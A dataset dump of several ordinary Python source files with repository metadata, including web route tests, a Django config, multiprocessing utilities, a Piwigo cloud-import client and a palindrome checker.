| 48.321429 | 124 | 0.66371 | 193 | 1,353 | 4.549223 | 0.46114 | 0.071754 | 0.037585 | 0.038724 | 0.04328 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00098 | 0.24612 | 1,353 | 28 | 125 | 48.321429 | 0.859804 | 0.49963 | 0 | 0 | 0 | 0 | 0.034865 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4375 | false | 0 | 0 | 0.25 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
858bb8166e2d1dd3ef4f31caed28313a875347b9 | 2,212 | py | Python | tests/station_test.py | RobMackie/CheckMeIn | 2cb66b4fff7259fa038a2754878056af9dbca6f4 | [
"MIT"
] | 1 | 2020-10-22T13:22:39.000Z | 2020-10-22T13:22:39.000Z | tests/station_test.py | RobMackie/CheckMeIn | 2cb66b4fff7259fa038a2754878056af9dbca6f4 | [
"MIT"
] | 34 | 2018-07-05T18:18:37.000Z | 2022-03-12T01:01:03.000Z | tests/station_test.py | RobMackie/CheckMeIn | 2cb66b4fff7259fa038a2754878056af9dbca6f4 | [
"MIT"
] | 1 | 2021-09-06T04:12:43.000Z | 2021-09-06T04:12:43.000Z | import CPtest
class StationTest(CPtest.CPTest):
def test_station(self):
self.getPage("/station/")
self.assertStatus('200 OK')
def test_scanned_success(self):
self.getPage("/station/scanned?barcode=100090")
self.assertStatus('303 See Other')
def test_scanned_success2(self): # if before made in, this should make out
self.getPage("/station/scanned?barcode=100090")
self.assertStatus('303 See Other')
def test_checkin(self):
self.getPage("/station/checkin?barcode=100091")
self.assertStatus('303 See Other')
def test_checkout(self):
self.getPage("/station/checkout?barcode=100090")
self.assertStatus('303 See Other')
def test_docs(self):
self.getPage("/docs")
self.assertStatus('200 OK')
def test_bulkUpdate(self):
self.getPage(
"/station/bulkUpdate?inBarcodes=100090+100091&outBarcodes=")
self.assertStatus('303 See Other')
def test_bulkUpdateAllOut(self):
self.getPage("/admin/emptyBuilding")
self.getPage("/station/makeKeyholder?barcode=100091")
self.getPage(
"/station/bulkUpdate?inBarcodes=100090+100091&outBarcodes=")
self.getPage(
"/station/bulkUpdate?inBarcodes=&outBarcodes=100090+100091")
self.assertStatus('303 See Other')
def test_scanned_bogus(self):
self.getPage("/station/scanned?barcode=0090")
self.assertStatus('303 See Other')
def test_scanned_keyholder_from_station(self):
self.getPage("/station/scanned?barcode=999901")
self.assertStatus('200 OK')
def test_makeKeyholder(self):
self.getPage("/station/makeKeyholder?barcode=100090")
self.assertStatus('303 See Other')
def test_scanned_keyholder_from_keyholder(self):
self.getPage("/station/keyholder?barcode=999901")
self.assertStatus('303 See Other')
def test_scanned_from_keyholder(self):
self.getPage("/station/keyholder?barcode=100091")
self.assertStatus('303 See Other')
def test_scanned_failure(self):
self.getPage("/station/scanned?barcode=fail")
self.assertStatus('303 See Other')
| 33.515152 | 79 | 0.670434 | 249 | 2,212 | 5.851406 | 0.184739 | 0.128346 | 0.185312 | 0.166095 | 0.769389 | 0.655456 | 0.520933 | 0.500343 | 0.409746 | 0.186685 | 0 | 0.078018 | 0.206148 | 2,212 | 65 | 80 | 34.030769 | 0.751708 | 0.017631 | 0 | 0.42 | 0 | 0 | 0.331644 | 0.241824 | 0 | 0 | 0 | 0 | 0.28 | 1 | 0.28 | false | 0 | 0.02 | 0 | 0.32 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
85908c15afe587db8551deda3b4c239f8d42664e | 145 | py | Python | moto/instance_metadata/models.py | chiemerieezechukwu/moto | 07b7d77611d345a99a253c366529822e1cc0b1ff | [
"Apache-2.0"
] | null | null | null | moto/instance_metadata/models.py | chiemerieezechukwu/moto | 07b7d77611d345a99a253c366529822e1cc0b1ff | [
"Apache-2.0"
] | null | null | null | moto/instance_metadata/models.py | chiemerieezechukwu/moto | 07b7d77611d345a99a253c366529822e1cc0b1ff | [
"Apache-2.0"
] | null | null | null | from moto.core import BaseBackend
class InstanceMetadataBackend(BaseBackend):
pass
instance_metadata_backend = InstanceMetadataBackend()
| 16.111111 | 53 | 0.827586 | 13 | 145 | 9.076923 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.124138 | 145 | 8 | 54 | 18.125 | 0.929134 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.25 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
85aaad8086c1464084670e1d9d0d929b49958353 | 132 | py | Python | zutils/cf_conventions.py | iosonobert/zutils | 02fe9b2c1d1596bf98ee9db2134402517d4a3732 | [
"BSD-2-Clause"
] | null | null | null | zutils/cf_conventions.py | iosonobert/zutils | 02fe9b2c1d1596bf98ee9db2134402517d4a3732 | [
"BSD-2-Clause"
] | 1 | 2021-11-21T05:47:03.000Z | 2021-12-10T00:28:05.000Z | zutils/cf_conventions.py | iosonobert/zutils | 02fe9b2c1d1596bf98ee9db2134402517d4a3732 | [
"BSD-2-Clause"
] | null | null | null | ## KEPT FOR BACK COMPAT
from .pyMOS import *
for i in np.arange(0, 10):
print('cf_conventions deprecated, use pyMOS instead.') | 22 | 58 | 0.704545 | 21 | 132 | 4.380952 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027778 | 0.181818 | 132 | 6 | 58 | 22 | 0.824074 | 0.151515 | 0 | 0 | 0 | 0 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
a44b81be4b5f996c49caae17c4954ab5a2d79374 | 31 | py | Python | ddtrace/contrib/vertica/constants.py | melancholy/dd-trace-py | 32d463e5465466bc876c85a45880a84824d9b47c | [
"Apache-2.0",
"BSD-3-Clause"
] | 308 | 2016-12-07T16:49:27.000Z | 2022-03-15T10:06:45.000Z | ddtrace/contrib/vertica/constants.py | melancholy/dd-trace-py | 32d463e5465466bc876c85a45880a84824d9b47c | [
"Apache-2.0",
"BSD-3-Clause"
] | 1,928 | 2016-11-28T17:13:18.000Z | 2022-03-31T21:43:19.000Z | ddtrace/contrib/vertica/constants.py | melancholy/dd-trace-py | 32d463e5465466bc876c85a45880a84824d9b47c | [
"Apache-2.0",
"BSD-3-Clause"
] | 311 | 2016-11-27T03:01:49.000Z | 2022-03-18T21:34:03.000Z | # Service info
APP = "vertica"
| 10.333333 | 15 | 0.677419 | 4 | 31 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193548 | 31 | 2 | 16 | 15.5 | 0.84 | 0.387097 | 0 | 0 | 0 | 0 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
f110129af89d79bf9ca90e80ac76cb3aa6153784 | 585 | py | Python | joinnector/service/lead_service.py | joinnector/rewardpythonsdk | b0f51023597fc5eb1c3c663d3e53b88598c3ea95 | [
"MIT"
] | null | null | null | joinnector/service/lead_service.py | joinnector/rewardpythonsdk | b0f51023597fc5eb1c3c663d3e53b88598c3ea95 | [
"MIT"
] | null | null | null | joinnector/service/lead_service.py | joinnector/rewardpythonsdk | b0f51023597fc5eb1c3c663d3e53b88598c3ea95 | [
"MIT"
] | null | null | null | # pylint: disable=useless-super-delegation
from joinnector.service.base_sdk_service import BaseSDKService
class LeadService(BaseSDKService):
def __init__(self, name):
super().__init__(name)
def get_by_customer_id(self, customer_id, swap_id=None):
return super().get_by("customer_id", customer_id, swap_id)
def get_by_email(self, email, swap_id=None):
return super().get_by("email", email, swap_id)
def get_by_mobile(self, mobile, swap_id=None):
return super().get_by("mobile", mobile, swap_id)
lead_service = LeadService("lead")
| 27.857143 | 66 | 0.717949 | 82 | 585 | 4.756098 | 0.341463 | 0.076923 | 0.061538 | 0.123077 | 0.271795 | 0.2 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0.164103 | 585 | 20 | 67 | 29.25 | 0.797546 | 0.068376 | 0 | 0 | 0 | 0 | 0.047882 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.363636 | false | 0 | 0.090909 | 0.272727 | 0.818182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
f13bcd20053baa92075a05739364b6b7dd954df4 | 87 | py | Python | BotAPI/apps.py | hanihusam/kitabisa-faqBot-api | e938be93dcb0fd1f8aa70ed31ec78fd6dd769aaf | [
"MIT"
] | null | null | null | BotAPI/apps.py | hanihusam/kitabisa-faqBot-api | e938be93dcb0fd1f8aa70ed31ec78fd6dd769aaf | [
"MIT"
] | null | null | null | BotAPI/apps.py | hanihusam/kitabisa-faqBot-api | e938be93dcb0fd1f8aa70ed31ec78fd6dd769aaf | [
"MIT"
] | 1 | 2021-05-28T03:55:44.000Z | 2021-05-28T03:55:44.000Z | from django.apps import AppConfig
class BotapiConfig(AppConfig):
name = 'BotAPI'
| 14.5 | 33 | 0.747126 | 10 | 87 | 6.5 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172414 | 87 | 5 | 34 | 17.4 | 0.902778 | 0 | 0 | 0 | 0 | 0 | 0.068966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
f151a37ab8e8d0aaebed15ae6a6151719ffc3011 | 200 | py | Python | stade/core/admin/challenge.py | ImageMarkup/stade | d930e8c7487754b2babd6a3be69f2c614cd7f609 | [
"Apache-2.0"
] | 4 | 2019-09-25T22:57:32.000Z | 2021-03-03T16:49:30.000Z | stade/core/admin/challenge.py | ImageMarkup/stade | d930e8c7487754b2babd6a3be69f2c614cd7f609 | [
"Apache-2.0"
] | 55 | 2019-10-30T16:58:43.000Z | 2021-10-09T23:26:03.000Z | stade/core/admin/challenge.py | ImageMarkup/stade | d930e8c7487754b2babd6a3be69f2c614cd7f609 | [
"Apache-2.0"
] | 1 | 2020-02-03T17:14:32.000Z | 2020-02-03T17:14:32.000Z | from django.contrib import admin
from stade.core.models import Challenge
from .task import TaskInline
@admin.register(Challenge)
class ChallengeAdmin(admin.ModelAdmin):
inlines = [TaskInline]
| 18.181818 | 39 | 0.795 | 24 | 200 | 6.625 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13 | 200 | 10 | 40 | 20 | 0.913793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.833333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
f1536b23646ae8873aeb40a048ca647cac26aaa8 | 304 | py | Python | test/app/api/query/test_common.py | awaisali88/Python-Flask-mongo | 4c7177587a90a109ea16fd8c1ec79ed15dbd35a0 | [
"MIT"
] | 3 | 2021-04-16T09:16:34.000Z | 2021-07-20T19:36:20.000Z | test/app/api/query/test_common.py | fsjunior/python-flask-restful-seed | 1b989d17ac3a0f27cb60be43c5e81310bf8a4c53 | [
"MIT"
] | 10 | 2020-11-03T14:52:24.000Z | 2021-06-28T21:25:05.000Z | test/app/api/query/test_common.py | fsjunior/python-flask-restful-seed | 1b989d17ac3a0f27cb60be43c5e81310bf8a4c53 | [
"MIT"
] | 1 | 2021-08-20T22:58:33.000Z | 2021-08-20T22:58:33.000Z | import pytest
from app.api.business.common import _validate_objectid
class TestCommon:
def test_if_valid_object_id(self):
_validate_objectid("5f960d555042a76847bfa0c8")
def test_if_invalid_object_id(self):
with pytest.raises(Exception):
_validate_objectid("fuba")
| 23.384615 | 54 | 0.743421 | 36 | 304 | 5.888889 | 0.666667 | 0.226415 | 0.084906 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068548 | 0.184211 | 304 | 12 | 55 | 25.333333 | 0.78629 | 0 | 0 | 0 | 0 | 0 | 0.092105 | 0.078947 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
f189cebe2f26722af23468e59d891613ab08abdc | 365 | py | Python | tests/data/expected/main/multiple_files_self_ref_single/output.py | adaamz/datamodel-code-generator | 3b34573f35f8d420e4668a85047c757fd1da7754 | [
"MIT"
] | 891 | 2019-07-23T04:23:32.000Z | 2022-03-31T13:36:33.000Z | tests/data/expected/main/multiple_files_self_ref_single/output.py | adaamz/datamodel-code-generator | 3b34573f35f8d420e4668a85047c757fd1da7754 | [
"MIT"
] | 663 | 2019-07-23T09:50:26.000Z | 2022-03-29T01:56:55.000Z | tests/data/expected/main/multiple_files_self_ref_single/output.py | adaamz/datamodel-code-generator | 3b34573f35f8d420e4668a85047c757fd1da7754 | [
"MIT"
] | 108 | 2019-07-23T08:50:37.000Z | 2022-03-09T10:50:22.000Z | # generated by datamodel-codegen:
# filename: test.json
# timestamp: 2019-07-26T00:00:00+00:00
from __future__ import annotations
from pydantic import BaseModel, Field
class Second(BaseModel):
__root__: str
class First(BaseModel):
__root__: Second
class Model(BaseModel):
test_id: str = Field(..., description='test ID')
test_ip: First
| 17.380952 | 52 | 0.715068 | 47 | 365 | 5.255319 | 0.595745 | 0.048583 | 0.048583 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060201 | 0.180822 | 365 | 20 | 53 | 18.25 | 0.765886 | 0.254795 | 0 | 0 | 1 | 0 | 0.026119 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.222222 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
f1912bf39e4668d29a6a0d234b0e66f432958934 | 3,436 | py | Python | utils.py | fgerzer/l2rpn_parallel_training | ffa741513b01468311da53011132aad8933169b3 | [
"MIT"
] | null | null | null | utils.py | fgerzer/l2rpn_parallel_training | ffa741513b01468311da53011132aad8933169b3 | [
"MIT"
] | null | null | null | utils.py | fgerzer/l2rpn_parallel_training | ffa741513b01468311da53011132aad8933169b3 | [
"MIT"
] | null | null | null | import multiprocessing as mp
import os
import queue
import signal
import torch
class BaseCallback:
def __init__(self, verbose: int = 0):
self.model = None
self.verbose = verbose
def init_callback(self, model):
self.model = model
def on_training_start(self):
pass
def on_step(self, sim_step, learn_step, **kwargs):
# If False, break off Training
return True
def on_training_end(self):
pass
def on_evaluation_end(self, sim_step, learn_step, **kwargs):
return True
def update_curriculum(self, curriculum):
pass
def on_episode_done(self, episode_results):
pass
class EpisodeResults:
def __init__(self):
self.reward = 0
self.done = False
self.n_steps = 0
self.infos = []
def update(self, step_results):
self.reward += step_results.reward
self.done = step_results.done
self.n_steps = step_results.n_steps
self.infos.append(step_results.info)
class WorkerCommunication:
def __init__(self):
self._model_output_queue = mp.Queue()
self._observation_queue = mp.Queue()
self._curriculum_queue = mp.Queue()
self._event_reset = mp.Event()
self._event_quit = mp.Event()
self.pid = None
def is_interrupted(self):
return self.is_reset() or self.is_quit()
def is_reset(self):
return self._event_reset.is_set()
def done_reset(self):
self._event_reset.clear()
def put_reset(self):
os.kill(self.pid, signal.SIGUSR1)
self._event_reset.set()
def get_curriculum(self, block=False):
curriculum = None
try:
while True:
curriculum = self._curriculum_queue.get(block=block)
except queue.Empty:
pass
return curriculum
def put_update_curriculum(self, curriculum):
self._curriculum_queue.put(curriculum)
self.put_reset()
def put_observation(self, observation):
self._observation_queue.put(observation)
def get_observation(self, block=True):
return self._observation_queue.get(block=block)
def _convert_to_numpy(self, container):
if isinstance(container, list):
return [self._convert_to_numpy(c) for c in container]
elif isinstance(container, dict):
return {k: self._convert_to_numpy(v) for k, v in container.items()}
elif isinstance(container, torch.Tensor):
return container.detach().cpu().numpy()
return container
def put_model_output(self, output):
self._model_output_queue.put(self._convert_to_numpy(output))
def get_model_output(self, block=True):
return self._model_output_queue.get(block=block)
def put_quit(self):
return self._event_quit.set()
def is_quit(self):
return self._event_quit.set()
class StepResult:
def __init__(self, observation, is_reset, action_chosen, reward, done, info, n_steps):
self.observation = observation
self.is_reset = is_reset
self.action_chosen = action_chosen
self.reward = reward
self.done = done
self.info = info
self.n_steps = n_steps
class EmptyLogger:
def add_scalar(self, name, value, step, steps_added=1):
pass
def add_mean_scalar(self, name, value, step, save_every):
pass
| 26.229008 | 90 | 0.644645 | 436 | 3,436 | 4.805046 | 0.224771 | 0.030072 | 0.021002 | 0.02864 | 0.117422 | 0.053461 | 0.02864 | 0 | 0 | 0 | 0 | 0.001979 | 0.264843 | 3,436 | 130 | 91 | 26.430769 | 0.827395 | 0.008149 | 0 | 0.135417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.28125 | false | 0.072917 | 0.052083 | 0.083333 | 0.520833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
74b534c8638ef61cac70e5025515efcb596f7590 | 861 | py | Python | modoboa/lib/tests/test_web_utils.py | HarshCasper/modoboa | a00baa0593107992f545ee3e89cd4346b9615a96 | [
"0BSD"
] | 1,602 | 2016-12-15T14:25:34.000Z | 2022-03-31T16:49:25.000Z | modoboa/lib/tests/test_web_utils.py | sebageek/modoboa | 57f5d57ea60a57e8dcac970085dfc07082481fc6 | [
"0BSD"
] | 1,290 | 2016-12-14T15:39:05.000Z | 2022-03-31T13:49:09.000Z | modoboa/lib/tests/test_web_utils.py | sebageek/modoboa | 57f5d57ea60a57e8dcac970085dfc07082481fc6 | [
"0BSD"
] | 272 | 2016-12-22T11:58:18.000Z | 2022-03-17T15:57:24.000Z | """Tests for web_utils."""
from django.test import SimpleTestCase
from .. import web_utils
class TestCase(SimpleTestCase):
"""Test functions."""
def test_size2integer(self):
self.assertEqual(web_utils.size2integer("1024"), 1024)
# Convert to bytes
self.assertEqual(web_utils.size2integer("1K"), 1024)
self.assertEqual(web_utils.size2integer("1M"), 1048576)
self.assertEqual(web_utils.size2integer("1G"), 1073741824)
# Convert to megabytes
self.assertEqual(web_utils.size2integer("1K", output_unit="MB"), 0)
self.assertEqual(web_utils.size2integer("1M", output_unit="MB"), 1)
self.assertEqual(web_utils.size2integer("1G", output_unit="MB"), 1024)
# Unsupported unit
with self.assertRaises(ValueError):
web_utils.size2integer("1K", output_unit="GB")
| 35.875 | 78 | 0.679443 | 99 | 861 | 5.757576 | 0.363636 | 0.140351 | 0.280702 | 0.282456 | 0.524561 | 0.463158 | 0 | 0 | 0 | 0 | 0 | 0.072961 | 0.188153 | 861 | 23 | 79 | 37.434783 | 0.742489 | 0.106853 | 0 | 0 | 0 | 0 | 0.034392 | 0 | 0 | 0 | 0 | 0 | 0.615385 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
74b9be151b2b41eaa658ae6d8f1fcf1c497e9235 | 210 | py | Python | examples/pause.bench.py | noirbizarre/minibench | a1ac66dc075181c62bb3c0d3a26beb5c46d5f4ab | [
"MIT"
] | 4 | 2015-11-19T09:42:01.000Z | 2021-12-30T06:18:02.000Z | examples/pause.bench.py | noirbizarre/minibench | a1ac66dc075181c62bb3c0d3a26beb5c46d5f4ab | [
"MIT"
] | null | null | null | examples/pause.bench.py | noirbizarre/minibench | a1ac66dc075181c62bb3c0d3a26beb5c46d5f4ab | [
"MIT"
] | null | null | null | from minibench import Benchmark
import time
class PauseBenchmark(Benchmark):
times = 10
def bench_one_hundredth(self):
time.sleep(.01)
def bench_one_tenth(self):
time.sleep(.1)
| 15 | 34 | 0.67619 | 27 | 210 | 5.111111 | 0.666667 | 0.115942 | 0.15942 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0.238095 | 210 | 13 | 35 | 16.153846 | 0.83125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
74ba6eee7aee97ac49609c9586036d1e49876f81 | 3,721 | py | Python | WebODM-master/plugins/cloudimport/platforms/piwigo.py | abhinavsri000/UAVision | 895fd883c1f5f492b4dcb573568b60ef03132cf6 | [
"MIT"
] | null | null | null | WebODM-master/plugins/cloudimport/platforms/piwigo.py | abhinavsri000/UAVision | 895fd883c1f5f492b4dcb573568b60ef03132cf6 | [
"MIT"
] | 8 | 2019-11-24T14:15:19.000Z | 2020-04-19T09:06:04.000Z | WebODM-master/plugins/cloudimport/platforms/piwigo.py | abhinavsri000/UAVision | 895fd883c1f5f492b4dcb573568b60ef03132cf6 | [
"MIT"
] | null | null | null | # Check http://piwigo.com/
from urllib.parse import urlparse
from os import path
from plugins.cloudimport.cloud_platform import File, Folder
from plugins.cloudimport.extensions.cloud_library import CloudLibrary
class Platform(CloudLibrary):
def __init__(self):
super().__init__('Piwigo', 'http://{server_url}/index.php?/category/{category_id}')
# Cloud Platform
def platform_file_processing(self, files):
# Piwigo has the concept of physical albums, that basically expose the actual folders in the file system.
# So it might happen that if the File Uploader plugin is used for GCP files, that the files will need to be renamed to store multiple GCP files.
# So basically we are taking any file that contains the string 'gcp_list' and has the extension '.txt' and rename it to 'gcp_list.txt'
return [self._map_gcp_file_if_necessary(file) for file in files]
def get_server_and_folder_id_from_url(self, url):
parse_result = urlparse(url)
paths = parse_result.query.split('/')
if not 'category' in paths or paths.index('category') >= len(paths) - 1:
raise Exception('Wrong URL format')
else:
category_id = paths[paths.index('category') + 1]
path = parse_result.path
if not 'index.php' in path:
raise Exception('Wrong URL format')
path = path[0:path.index('index.php')]
server = parse_result.scheme + '://' + parse_result.netloc + '/' + path
return server, category_id
def build_folder_api_url(self, server_url, folder_id):
return '{server_url}/ws.php?format=json&method=pwg.categories.getList&cat_id={folder_id}&recursive=false'.format(server_url = server_url, folder_id = folder_id)
def parse_payload_into_folder(self, payload):
result = payload['result']['categories'][0]
return Folder(result['name'], result['url'], result['nb_images'])
def build_list_files_in_folder_api_url(self, server_url, folder_id):
# ToDo: add pagination
return '{server_url}/ws.php?format=json&method=pwg.categories.getImages&cat_id={folder_id}&recursive=false&per_page=500'.format(server_url = server_url, folder_id = folder_id)
def parse_payload_into_files(self, payload):
result = payload['result']
return [File(image['file'], image['element_url']) for image in result['images']]
def _map_gcp_file_if_necessary(self, file):
_, file_extension = path.splitext(file.name)
if file_extension.lower() == ".txt" and 'gcp_list' in file.name:
return File('gcp_list.txt', file.url, file.other)
return file
# Cloud Library
def build_folder_list_api_url(self, server_url):
return '{}/ws.php?format=json&method=pwg.categories.getList&recursive=true&tree_output=true'.format(server_url)
def parse_payload_into_folders(self, payload):
categories = payload['result']
return self._flatten_list([self._build_category(cat) for cat in categories])
def _build_category(self, category):
name = category['name']
images = category['nb_images']
url = category['url']
subcategories = self._flatten_list([self._build_category(subcat) for subcat in category['sub_categories']]) if category['nb_categories'] > 0 else []
for subcategory in subcategories:
subcategory.name = name + ' > ' + subcategory.name
folder = [Folder(name, url, images)] if images > 0 else []
return folder + subcategories
def _flatten_list(self, list_of_lists):
return [item for sublist in list_of_lists for item in sublist]
| 50.283784 | 183 | 0.677775 | 499 | 3,721 | 4.835671 | 0.268537 | 0.041028 | 0.024865 | 0.028181 | 0.259014 | 0.185661 | 0.136759 | 0.136759 | 0.089515 | 0.089515 | 0 | 0.00308 | 0.214727 | 3,721 | 73 | 184 | 50.972603 | 0.822724 | 0.12201 | 0 | 0.037736 | 0 | 0.056604 | 0.172752 | 0.088984 | 0 | 0 | 0 | 0.013699 | 0 | 1 | 0.226415 | false | 0 | 0.075472 | 0.09434 | 0.54717 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
74c6d82a9c9ae4213c54a331a93faaca5a28ac5b | 285 | py | Python | Python/isPalindrome/palindrometextchecker.py | Wilo/exercises | 30d47dce1414c0fba4e0afa7f23a918d8f9b3895 | [
"MIT"
] | null | null | null | Python/isPalindrome/palindrometextchecker.py | Wilo/exercises | 30d47dce1414c0fba4e0afa7f23a918d8f9b3895 | [
"MIT"
] | null | null | null | Python/isPalindrome/palindrometextchecker.py | Wilo/exercises | 30d47dce1414c0fba4e0afa7f23a918d8f9b3895 | [
"MIT"
] | null | null | null | """
Source: https://en.wikipedia.org/wiki/Palindrome#Names
"""
def is_palindrome(text: str) -> bool:
return text.lower() == text.lower()[::-1]
if __name__=='__main__':
text = input('Give me the text to analyze: ')
print(f'{text} Is Palindrome?: {is_palindrome(text)}')
| 21.923077 | 58 | 0.645614 | 39 | 285 | 4.461538 | 0.692308 | 0.206897 | 0.183908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004149 | 0.154386 | 285 | 12 | 59 | 23.75 | 0.717842 | 0.189474 | 0 | 0 | 0 | 0 | 0.364865 | 0.094595 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.2 | 0.4 | 0.2 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
74cf21dfcf868ba005dc3a43f11e4b5edc9b582d | 2,779 | py | Python | tests/output/expected_geojson_output/same_uic_ref_overlapping.py | public-transport-quality-grades/oevgk18-generator | e467587d3d3c600a66139756e95bd84040d58c99 | [
"MIT"
] | null | null | null | tests/output/expected_geojson_output/same_uic_ref_overlapping.py | public-transport-quality-grades/oevgk18-generator | e467587d3d3c600a66139756e95bd84040d58c99 | [
